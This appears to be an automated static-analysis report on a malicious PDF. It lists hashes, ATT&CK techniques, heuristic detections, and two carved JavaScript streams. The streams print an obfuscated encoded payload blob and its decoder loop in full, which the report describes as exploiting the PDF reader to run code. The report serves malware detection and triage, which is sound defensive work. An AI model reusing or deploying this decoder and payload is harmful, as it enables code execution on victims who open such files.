Malicious PDF — malware analysis report

Static analysis result for SHA-256 7e93d811def3c0df…

MALICIOUS

PDF

2.5 KB First seen: 2026-05-11
MD5: acffd81fbc697917de1b229cc9b16e75 SHA-1: d6b1ae3f0e0a82fcf23bce551a3426e50a9c40ce SHA-256: 7e93d811def3c0dfa0c9fb5b5566d82ccda9983d854f183e82761a9ef992392d
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT' and 'PDF_JS_EXPLOIT_CLUSTER'. The JavaScript uses 'String.fromCharCode' for obfuscation and is designed to exploit a vulnerability within the PDF reader to execute a malicious payload. The primary technique observed is the exploitation of a client for code execution via JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    fscoa=new Array();while(bshtepg2.length){fscoa.push((erkrynk(bshtepg2.charCodeAt(0))<<(4+2))+erkrynk(bshtepg2.charCodeAt(1))-(500+12));bshtepg2=bshtepg2.slice(2,bshtepg2.length)}iudoj9=kvasg=bshtepg2=0;hvkoa6='';function erkrynk(aohpcm){if(aohpcm>92)aohpcm--;return aohpcm-42}function xzarfr(){if(bshtepg2==0){kvasg=erkrynk(xwbofmh.charCodeAt(iudoj9++));bshtepg2=6;}return ((kvasg>>--bshtepg2)&0x01);}while(bwgmb--){i=0;while(fscoa[i]<0){if(xzarfr())i=-fscoa[i];else i++;}hvkoa6+=String.fromCharCode( …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj111711_000.js pdf-javascript-stream PDF /JS object 111711 at offset 0x197 2420 bytes
SHA-256: 5bdb7a1d6cc913f16e928cff1cb85c3094dad965ee3adb9a296d87e7ec60f60f
Preview script
First 1,000 lines of the extracted script
bshtepg2="0T1+1Z1f2Z1d2]1b3]1`2h1^3b1[2V2g1H1S1V2b1T3Z3_1O1P272f1M3^1K3S1I3f3h1F3K1D3L1B3d1:1=1>2Y2e1;2T2W1215163/33133+3-1.1/3G3T1,3=3E0^0i3`0g3M0c0d242R0a3a0_2L2U0Y0Z2[2_0W3P0U3N3Y0:0K0P2O0N2^0L3V3X0I2J0G2d0A0D2S0B3I3Q0=0>3W3c0;2X3R06072`3O042a2c";xwbofmh="FNeLCFj9=LehXLcPW9005.Kh>a^b,g>@?:hIO_a_W9005.UeECfVQI_I?,RI`7VhZY//O??1M-/L?5ceM[KL[2T>@?;I454RgBBV<RG;cZ[BOI/N85.[LeHf@J9TPaHMcR?ZT>@?:aN_0QRgBBV<4O/KI45,LZRVTO[KTY7Y5RZZ[M`-TQ_HRj:Z[M]ac?454SFBDO4RG:AR4+:4+;>RVTO[KT6gg7:eJY@J**+>RVTO[KT309=9PHRG<=e@>BOT`HK6OJ:P,[N3K0G,@?P:J+YZJ**:P9*.3Ub]K36+e.dTJK0J.R:Md+,HF,R:/7,.2-^R:^^/:M:ge._c9K98,_33U:K0Kf_3d[,R<<PK,B;Q:PDGV2**].+J+,18bB:07a.**,.`Z6K1Xbc:*+N3MJ,.iaE,H^=:PDR>2**].Z:+,H1I,**+,8F*:MGWN2**].iZ+,H^=:PDR>2**].NZ*K*BfR=^4/,<]]R:+G4.**,.FGc:K-:,.jZe.N3LR==Ph,4fGK3,+V3hJ,.hPPK0cR>2**4.Z:+,@[^R:0B4.**,._baK/,hN2*V,.**,.Z6/,@[^R:0C_2**.2*FD.*87,DEf:LKH].+PE,**+,IE+:QV__2;eK:J**R=+*.2*FD.H+^R:6c_3SYW,4/f2:0CV2**.2da,K67E2:*+N3hJ,.hPPK6`:R:*+N3JJ,.g8i.**,.Fc*K0fE2:*+N3hJ,.hPPK6`:R:*+N33J+,*[b:QP>4.OOO:J,fB:**2;[bK,.7*2=j-R<:P4K78E_2UWa.N20ZQa*2=aDD.ELK:J**R=+*.3E18K*CJR:**2==ID.>5a:J,Z2:**2=*Z>3E18K*CQ:J**:J+[R:*c_3SYW,4/f2:0CV2**.3hV/,H^=:KX>4.**/,B2*K*-M:MZ8G,+Q0K77hR;:YC,*^7K***K18Z>3KUC,**6K59*.3MVHK67PZP1CD.?59K***K***K***K***K***K***K***K***K8[S.3M<0ZQ9GN3J.+,.7dN2`QI,7>*:Q6d_2`A7K8/`R=P.,K,5.,K*+U2=VD;,B+-B=Q.,K0Ve>3^HE,GK*R:L;.R=,*,.fHW,.Hb2=SGN2FF*:MKID.F;hR;:<,.2ZaZJU8HK9VcL.N[`R:f?+,*.O:J**:Ka+4.*=-R:**2:^bG,IJ<K*.Ze.**,.2-^R=d.I,6>UR:f*O,*3K_2**.2Fhf_2*P8K***K*NCe.BGi:J**R:[Z+,+2^_2ZfgK**+:P**:KQM1:Qc.R:+68K***K6_[_2gG3N3Q0HK9Z3:J,BG,**+,4ff:M[1aK14[N2EQ<K,0dD.^:E,DFa>3PfD.HCD>2.W,..;i:J**R<=*,.W^XK-9G_3R4C,+2+:M1IN2**4.iZ+,0H?_3i+4.*=-R:**2==O<K*+J:J**:J**:J**:J**:J**:J**:J**:Qa*2;Kbd,**,K6c*K7j,2;^Vi.Fd^R=7[_2--1:QJUB:ce@ZJ,2E,DhS_3P4O,7?JR;UPY:JWEV2`=@ZJ*`>3JV].D`TR:JMQ:Q4fB=PFe.[Y7K0h^R=OGD.D^VK,**2=XdV2:+0:JWdV2;jC,*1C,.,e>2;5P:JWfc=Y2,.*,*K,0hg2:+-B:=S0K,3,G,Fh^R:@hN3^XO,,G^_25H?,Gd*:NQ.+,<He_2*<E,@**AUK>RVTO[KT54XSWQRG;2[eCg^`h7Vha=Ye9TK/<L]TA00TECe1>CdcDMfSD@?G=E9<j:AVYX/<L]TA00RgBBV<RG<=e@>BOT`HK5+B2<Z@+HX/<L]T9005.T1>cXYERX3U=[KL[2I?7VhZT>@?<cZ`4I<FP4K`5?4Rie,hD***A49LM99-/<L]TFi7<`FBDO9S8=RG:/D>iNd8Kj<Q_Q3L4_Sh3]G5ej?ZY//O??APbO_BBB[cjeQ_Q3QgRG;cZ[BO<j;2[eCg^[>RVTLi>@?<cZ`9UW0G6i9>8S3h546<`DY:J4+>2,J>YA,S;C?-`iA=E<`hGR^SQ[eiPaHf3bh-iPWWJUKHIAD6eCgHSI1>iX_C_^cg?5d;C?.fgX5?I4IPP6FIcPi7W-T9aj76Bei>j77TLCi5Z[G6IPG^e_Y/N89eI4gY-eUZWGQ]iX_C_^cgAfK>";bwgmb=2701;
javascript_obj111712_001.js pdf-javascript-stream PDF /JS object 111712 at offset 0x852 511 bytes
SHA-256: d930752a68866281b864c3236bdc601198a65cafe9bbdc10a90f53d79b2dd5f3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
fscoa=new Array();while(bshtepg2.length){fscoa.push((erkrynk(bshtepg2.charCodeAt(0))<<(4+2))+erkrynk(bshtepg2.charCodeAt(1))-(500+12));bshtepg2=bshtepg2.slice(2,bshtepg2.length)}iudoj9=kvasg=bshtepg2=0;hvkoa6='';function erkrynk(aohpcm){if(aohpcm>92)aohpcm--;return aohpcm-42}function xzarfr(){if(bshtepg2==0){kvasg=erkrynk(xwbofmh.charCodeAt(iudoj9++));bshtepg2=6;}return ((kvasg>>--bshtepg2)&0x01);}while(bwgmb--){i=0;while(fscoa[i]<0){if(xzarfr())i=-fscoa[i];else i++;}hvkoa6+=String.fromCharCode(fscoa[i]);}

Open this report in the interactive analyzer, or submit your own file for analysis.